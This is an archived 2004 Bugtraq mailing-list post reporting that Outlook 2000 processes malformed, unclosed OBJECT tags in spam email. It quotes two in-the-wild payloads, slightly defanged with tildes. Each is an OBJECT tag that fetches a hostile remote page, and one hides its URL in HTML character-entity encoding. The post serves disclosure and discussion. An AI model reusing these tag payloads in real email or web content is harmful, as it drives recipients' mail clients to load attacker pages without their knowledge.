lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 7 Jun 2004 16:15:47 -0400
From: "James C Slora Jr" <Jim.Slora@...a.com>
To: <bugtraq@...urityfocus.com>
Subject: OBJECT Bugs or Features


Two questions about the recent OBJECT tag assault in spam messages:

1. Should an email client process an OBJECT tag that has no corresponding
/OBJECT?
2. Should an email client process an OBJECT tag that is not even embedded
within HTML tags? 

Apparently the current answer in Outlook is Yes. Two examples below leap to
the Web to download very hostile pages from fully patched fully updated
Outlook 2000. I have not tested in other versions, but the volume of the
incoming spam with these tags suggests other versions are vulnerable too.

I don't think this is new ground, but it is very much wild now.

~ inserted in key places to reduce "you sent me spam" notices.

 
From: "Yesenia Edwards" <YMNUDEWDQHFZWU@...oo.com>
To: <blah@...h.blah>
Subject: the email from 2 days ago.. here is my replay..
Date: Mon, 07 Jun 2004 13:29:40 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--6941203962437317574"

----6941203962437317574
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

~object
data=3D"http://www.seductiveones.~biz/easy/orrorr/sock/page.~php"~=20

----6941203962437317574--



Many other messages have Object tags that look like this:

~object =
data=3D"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#1=
19;&#105;&#108;&#100;&#119;&#105;&#110;&#99;&#97;&#115;&#105;&#110;&#111;=
&#46;&#110;&#101;&#116;&#47;&#112;&#97;&#103;&#101;&#46;&#112;&#104;&#112=
;"~

Note they mix "=" and "=3D" in addition to not closing the OBJECT tag. The
hostile site URL is often obfuscated through ASCII HTML encoding.



Powered by blists - more mailing lists